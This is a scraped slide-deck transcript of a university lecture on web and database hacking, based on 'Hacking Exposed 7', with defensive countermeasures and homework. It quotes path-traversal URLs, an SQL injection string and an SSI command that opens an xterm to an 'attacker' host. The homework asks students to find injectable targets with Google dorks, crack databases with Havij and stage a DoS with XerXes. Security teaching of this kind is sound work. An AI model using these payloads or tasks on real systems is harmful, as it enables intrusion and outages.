Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacking Exposed 7 Network Security Secrets & Solutions

Published byRobert Fisher Modified over 9 years ago

Similar presentations

Presentation on theme: "Hacking Exposed 7 Network Security Secrets & Solutions"— Presentation transcript:

1 Hacking Exposed 7 Network Security Secrets & Solutions
Chapter 10 Web and Database Hacking

2 Outline Web Server Hacking Web Application Hacking
Sample Files and Source Code Disclosure Canonicalization Attacks and Server Extensions Buffer Overflows and Denial of Service Vulnerability Scanners Web Application Hacking Googledorks and Web Crawling Assessment and Analysis Web Application Security Scanners Common Web Application Vulnerabilities Database Hacking Database Discovery Database Vulnerabilities Other Considerations Summary

3 HBGary Federal Attacked by “Anonymous” in 2011
Victim: security startup – HBGary Federal Hackers: “Anonymous” SQL injection vulnerability in their CMS (content management system) Foreign parameters passed to CMS SQL database Reveal usernames, addresses, password hashes Offline cracked MD5 password hashes with rainbow tables Same passwords used in Twitter, Linkedln, Facebook, and accounts Glibc privilege escalation attack to gain root to get into systems Anonymous published gigabytes of s of HBGary Federal employees

4 Web Server Hacking Sample Files and Source Code Disclosure
Example: Microsoft’s IIS 4.0 Sample code was installed by default showcode.asp and codebrews.asp These files enable an attacker to view almost any file on the server like this: /../../../boot.ini /../../../../../winnt/repair/setup.log Solution Remove them from production web servers Source Code Disclosure Example: IIS +.htr vulnerability IIS 4 and 5 could reveal portions of source code through the HTR vulnerability Attack URLs: Never store sensitive data in your application source code

5 Web Server Hacking Canonicalization Attacks and Server Extensions
The process of resolving a resource to a standard name is called canonicalization Example: ASP::$DATA vulnerability in Microsoft’s IIS Affected IIS 4 and earlier versions ASP DATA issue could reveal source code Just adding ::$DATA to the end of an ASP page's URL revealed the source code Solution Compartmentalize your application directory structure Server Extensions Example: Microsoft WebDAV "Translate: f" problem Add "translate: f" to header of the HTTP GET request, and a \ to the end of the URL This problem could reveal source code Patching or disabling the vulnerable extension

6 Web Server Hacking Buffer Overflows and Denial of Service
Example: IIS HTR Chunked Encoding Transfer Heap Overflow Affects Microsoft IIS 4.0, 5.0, and 5.1 HTTP request whose data contains 'Transfer-Encoding: chunked' with the file name ending with ".htr" Leads to remote denial of service or remote code execution at the privilege level Solution Apply a software patch, preferably from a reliable source Denial of Service Example: The Jester’s tool XerXes Appears to perform layer 7 attacks Limit the number of POST parameters to 10,000

7 Web Server Hacking Vulnerability Scanners
Nikto Comprehensive tests against web servers for web server vulnerabilities PROS CONS Update by simple command Does not take IP range as input CSV format Not support digest or NTLM authentication Support SSL Cannot perform check with cookies Capture cookie from web server Support nmap output as inputs Support multiple IDS evasion techniques

8 Web Server Hacking Vulnerability Scanners
Nessus Network vulnerability scanner for known server vulnerabilities PROS CONS Have GUI Not directly focus on web server Client/server architecture auto test Real time updates to the scan database require a subscription Target can be scanned automatically Limited http authentication support Provide proxy support with authentication

9 Web Application Hacking Googledorks and Web Crawling
Finding Vulnerable Web Apps with Google (Googledorks) Example: “Index of /password” Site: Web Crawling Static and dynamic pages Include and other support files Source code Server response headers Cookies Web-crawling Tools Wget HTTrack

10 Web Application Hacking Assessment and Analyze
Web Application Assessment Authentication Session management Database interaction Generic input validation Application logic Tool example: WebScarab Allows user to intercept and alter HTTP Includes spidering and fuzzing Runs on any platform Analyze Browser plug-ins Modify the data and send to the remote server Free tool suites Built around web proxies between the web client and the web server

11 Web Application Hacking Web Application Security Scanners
Server Analyzer Tool example: Nmap A tool to fingerprint and identify the software running a web server Web Brute Tool example: Nessus Checks authentication interfaces for weak credentials Web Discovery Port scanner Web Proxy Tool example: Burp Suite Local man-in-the-middle analysis tool for disassembling web communications Tool: Burp Suite Proxy, Repeater, Sequencer, Spider Powerful tool to craft automated attacks

12 Common Web Application Vulnerabilities
Cross-Site Scripting (XSS) Targeted at other users of the vulnerable application: post-to-propagate Example: Countermeasures: Filter out input parameters for special characters SQL Injection Request for dynamic content  SQL query with request parameters Example: Username: ‘ or 1=1- Countermeasures: (1) Use bind variables (2) Lock down the database server configuration (3) Implement default error handling Cross-Site Request Forgery (CSRF) Example: Send a fake POST request to a server Countermeasures: Authenticated session HTTP Response Splitting Example: Click a specially crafted hyperlink in a malicious website Countermeasures: Solid input validation on server input Misuse of Hidden Tags Example: <input type=hidden name=“price” price=“100”>, hacker can change the price by himself Countermeasures: Limit the use of hidden tags Server Side Includes (SSIs) Example: <!--#exec cmd=“/usr/X11R6/bin/xterm –display attacker:0 &”--> Countermeasures: Strip out any unauthorized SSI line

13 Database Hacking Database Discovery
Example: Nmap Countermeasures Never expose your databases directly to the Internet Run intrusion detection tools to identify network port scanning attempts

14 Database Hacking Database Vulnerabilities
Network attacks Example: CVE , listener vulnerability that can be exploited without any privileges Countermeasures: Limit IP addresses to access the database Database engine bugs Example: Use buffer overflows to gain full control of the database Countermeasures: Apply DBMS vendor patches Weak or default passwords Countermeasures: Alert users to weak and default passwords Misconfigurations Example: Leaving listening components without using management passwords at all Countermeasures: Periodically scan your databases Indirect attacks Example: Install a keylogger on the database administrator’s machine Countermeasures: Do not click untrusted/unknown links Tool Example: Havij Havij is one of the best Automatic SQL injection tools

15 Database Hacking Infecting more machines
Other Considerations Infecting more machines Attackers infect database tables with malicious scripts The user’s browser receives a script from the attacker’s site => infecting the user’s machine

16 Summary Web and database hacking has become an increasingly more visible and relevant threat Secure by keeping up with patches and best-practice configurations The importance of validating all user inputs and outputs

17 Homework Ch10 (30 points) Google Dork (30 points) Havij
Using googledork to find a target which can be injected. Explain why this target can be injected. Explain how to avoid it. (30 points) Havij Install Havij. Explain how to use this tool. Using Havij to crack a database. (60 points) SQL injection Try to use SQL injection to crack a web application. Explain why this web application can be cracked. (30 points) Burp Suite Install Burp Suite. Using Burp Suite to scan a target, what kind of information can you get? (40 points) Browser plug-in Introduce a Browser plug-in on chrome or firefox which can do web application hacking. Explain how to use this tool, and show your results. Bonus (40 points) Using XerXes to do DoS attack.

18 Homework #6 Ch9-Ch10 (150 points) Due: 6/15 (Mon) in the class in printed hardcopy (format: problem, solution with explanation, screen dumps) (60 points) Hacking (a game) ROM 1) Learn how to hack a game ROM from this link 2) Change 2 PLAYER GAME in menu to 2 Your Name GAME, e.g., I change the 2 PLAYER GAME to 2 EKARAT GAME. Capture and paste your change. * You can download the target game rom (Super Mario Adventure (SMB1 Hack).nes) at the course webpage.

19 Homework #6 Ch9-Ch10 (150 points) (2/2)
2. (30 points) Use your Hex editor to modify any programs you want, and tell us 1) What is the target program? 2) What is your modification? Show the captured screen of the result. 3. (30 points) Havij Install Havij. Explain how to use this tool to crack a database. 4. (30 points) Burp Suite Install Burp Suite. Explain how to use this tool. Using Burp Suite to scan a target, what kind of information can you get?

Download ppt "Hacking Exposed 7 Network Security Secrets & Solutions"

Similar presentations

Module XII Web Application Vulnerabilities

Module XII Web Application Vulnerabilities
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Attacking Session Management Juliette Lessing

Attacking Session Management Juliette Lessing
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Similar presentations

Ads by Google